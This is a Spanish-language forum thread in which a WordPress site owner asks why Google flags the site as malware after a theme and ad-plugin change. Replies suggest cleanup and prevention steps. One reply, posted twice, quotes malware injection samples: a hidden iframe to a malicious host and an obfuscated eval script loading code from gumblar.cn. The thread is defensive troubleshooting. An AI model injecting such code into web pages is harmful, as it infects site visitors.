Problema después de modificar el footer

• Autor Autor Sommera
  • Fecha de inicio Fecha de inicio
Sommera

Sommera

1
Pi
Verificado
Verificación en dos pasos activada
Verificado por Whatsapp
¡Ha verificado su Paypal!
Suscripción a IA
hola como andan ?

ayer cambie de theme lo modificamos con un amigo, y quedo todobien...

hoy instale un plugin para poner ads de 125 x 125 ... y andaba todo bien

despues agarre agregue a un enlace al pibe que me habia aydado a poner el plugin y configurarlo y me puse a modificar una cosa del footer lo que aparece abajo que dice "powered by wordpress......." y eso. Psue guardar y se me puso en blanco la pantalla osea como que noc argaba nada..... y ahora intento entrar a la web y no me funciona, le pregunte a un amigo y le el chrome le tira esto..

Enlace eliminado

por el ftp puedo entrar, pero al wp-admi no me deja y al sitio tmp...

y lo que dice esa imagen dice esto:

*Advertencia: Visitar este sitio puede dañar tu equipo.
El sitio web de contiene elementos del sitio besloqawe.com, que parece alojar software malintencionado, es decir, software que puede dañar tu equipo o puede operar sin tu consentimiento. Tu equipo puede resultar infectado con solo visitar un sitio que aloje software malintencionado.
Si quieres obtener más información sobre los problemas relacionados con estos elementos, visita Página de diagnóstico de navegación segura de Google de besloqawe.com.
Obtén más información sobre cómo protegerte ante software malicioso online.
Entiendo que visitar este sitio puede dañar mi equipo.

alguien me puede explicar que pasa ?

y que es besloqawe.com ?

gracias!

Última edición:
puede ser que tu pc este infectada, y hayan tomado tus datos para acceder al panel y agregar codigo malicioso del atacante, y tu pagina haya estado repartiendo malware, asi que google detecto eso y ha bloqueado.

Tu Ordenador debes desinfectar, y estar seguro que esta limpio para que restablescas en tu wp-admin antes que te quiten los acceso del hosting, dominio... por seguridad

como lo solucioono, me das una ayuda porfavor ?¿

metiste algun codigo de algun tipo de publicidad recientemente

de adsense ?

puse adsense si porque cambie el theme...

o banners ?

estaban en blanco osea para colocar anuncios...

No creo que pueda ser por el adsence, seguramente sea un virus, pero no conozco la manera de eliminarlos de wordpress

puede ser que el theme que descargue este infectado ?

yo puedo entrar normal no me sale esa advertencia

Ricardo Núñez - 06/05/2010
Para vbhispano

Cito:
Hay un virus circulando en la red que se filtra en tu computadora (independientemente su sistema operativo) que, para ser exactos se ubica en el software de Adobe.
Este código generalmente no provoca daños en tu ordenador, sin embargo detecta códigos de FTP para filtrarse en los sitios que tengas almacenados, una vez que tiene acceso a los sitios, les inyecta un código a todos los PHP y HTML (ese último algunas veces) en iframe oculto que hace a los archivos inservibles.

lgunos ejemplos del código son:
Insertar CODE, HTML o PHP:
<iframe  src=”http://sitiomalicioso:8080/index.php”  mce_src=”http://sitiomalicioso:8080/index.php” width=107 height=152  style=”visibility: hidden”></iframe>

o más compuestos como:
(function(jil){var  xR5p=’%';eval(unescape((’var”20a”3d”22Sc”72iptEngin”65″22″2c”62″3d”22″56ers”69on()+”22″2c”6a”3d”22″22″2cu”3dnavig”61t”6  ……………  “65rAgent”3bif((”75″2eind”65xOf”28″22Win”22)”3e0)”26″26(u”2e”69n”64exO”66(”22NT”20″36″22″29″3c0)”26″26(documen”74″2ecookie”2e”69ndex”4f”66″28″22″6die”6b”3d1″22)”3c0)”26″26″28t”79″70e”6ff3bdocu”6de”6e”74″2ewr”69″74e(”22″3csc”72ipt”20sr”63″3d”2f”2fgumblar”2ecn”2frss”2f”3fid”3d”22+j+”22″3e”3c”5c”2f”73cript”3e”22″29″3b”7d’).replace(jil,xR5p)))})(/”/g);

Estos códigos que pueden ser más largos se colocan en cada archivo PHP y HTML de tu web.

Forma de quitarlo:
- Baja todos los archivos y elima el código.
- En vBulletin re-sube los archivos de hacks y del mismo vB, incluye TODO archivo PHP

Como Prevenirse:
- Quita programas como Adobe Reader y Adobe Flash, bájalos de la web de adobe de nuevo en su última versión.
- Analiza con tu antivirus ACTUALIZADO
- Cambia seguido las contraseñas FTP
- Borra la caché de tu navegador
- Borra los historiales que tengas guardados en tu software de FTP, es decir, las cuentas guardadas.

Ricardo Núñez - 06/05/2010
Para vbhispano

Cito:
Hay un virus circulando en la red que se filtra en tu computadora (independientemente su sistema operativo) que, para ser exactos se ubica en el software de Adobe.
Este código generalmente no provoca daños en tu ordenador, sin embargo detecta códigos de FTP para filtrarse en los sitios que tengas almacenados, una vez que tiene acceso a los sitios, les inyecta un código a todos los PHP y HTML (ese último algunas veces) en iframe oculto que hace a los archivos inservibles.

lgunos ejemplos del código son:
<iframe  src=”http://sitiomalicioso:8080/index.php”  mce_src=”http://sitiomalicioso:8080/index.php” width=107 height=152  style=”visibility: hidden”></iframe>

o más compuestos como:
(function(jil){var  xR5p=’%';eval(unescape((’var”20a”3d”22Sc”72iptEngin”65″22″2c”62″3d”22″56ers”69on()+”22″2c”6a”3d”22″22″2cu”3dnavig”61t”6  ……………  “65rAgent”3bif((”75″2eind”65xOf”28″22Win”22)”3e0)”26″26(u”2e”69n”64exO”66(”22NT”20″36″22″29″3c0)”26″26(documen”74″2ecookie”2e”69ndex”4f”66″28″22″6die”6b”3d1″22)”3c0)”26″26″28t”79″70e”6ff3bdocu”6de”6e”74″2ewr”69″74e(”22″3csc”72ipt”20sr”63″3d”2f”2fgumblar”2ecn”2frss”2f”3fid”3d”22+j+”22″3e”3c”5c”2f”73cript”3e”22″29″3b”7d’).replace(jil,xR5p)))})(/”/g);

Estos códigos que pueden ser más largos se colocan en cada archivo PHP y HTML de tu web.

Forma de quitarlo:
- Baja todos los archivos y elima el código.
- En vBulletin re-sube los archivos de hacks y del mismo vB, incluye TODO archivo PHP

Como Prevenirse:
- Quita programas como Adobe Reader y Adobe Flash, bájalos de la web de adobe de nuevo en su última versión.
- Analiza con tu antivirus ACTUALIZADO
- Cambia seguido las contraseñas FTP
- Borra la caché de tu navegador
- Borra los historiales que tengas guardados en tu software de FTP, es decir, las cuentas guardadas.

si, fue eso, yo descargue un adobe y no me andaba, pero no me lo tomo como virus, aunque seguro fue eso que me infecto...

ahora ya subi otro theme, y cuando lo escaneo con el plugin de antivirus me dice que no tiene virus, pero me marca algunas lineas como peligrosas...

en esas lineas aparece por ejemplo eval eso es que sigo infectado (este es otro theme)

y ya paso el antivirus actualizado por mi pc pero no me detecta nada... como puedo hacer para curarme?

gracias!

Una pregunta ¿ya se solucionó tu problema?

Una pregunta ¿ya se solucionó tu problema?

no estoy seguro, creo que si, lo que no se, es com saber si sigo infectado... por eso que explico un usuario en la hoja anterior...

y si alguien me puede decir que puedo utilizar para mejorar la seguridad osea, si existe algun plugin que bloquee estas modificaciones o algo similar, me explico ?

gracias!

Ah ok, para este tipo de casos puedes utilizar las herramientas para Webmaster de Google. Ahí hay una sección donde te dice si tu página se ha infectado y con que.
A mi me paso lo mismo cuanto utilice un plugin para gestionar la publicidad 125x125 (no recuerdo el nombre).

En otra ocasión me sucedió al poner publicidad tipo Impresiones Web, o intercambio de enlaces.

Lo que hice para solucionarlo fue eliminar la publicidad que no fuera de adsense, así como el plugin para gestionar la publicidad de 125x125. Además de visitar la sección para Webmaster, ahí me venía la razón.

Espero haberte ayudado.

Ese mensaje que te ha salido es claramente un Virus.

a) Elimina la Linea del file, vuelvelo a subir desde una pc limpia.
b) desinstala tus programas ftp de la maquina infectada.

Ese mensaje que te ha salido es claramente un Virus.

a) Elimina la Linea del file, vuelvelo a subir desde una pc limpia.
b) desinstala tus programas ftp de la maquina infectada.

cada vez que lo borro no me deja entrar a la pagina me tira algun error :S

como puedo hacer?

Borra todo y has una instalacion nueva eso limpiara todos tus archivos no olvides hacer antes backup por seguridad y pasarle un antivirus a tu pc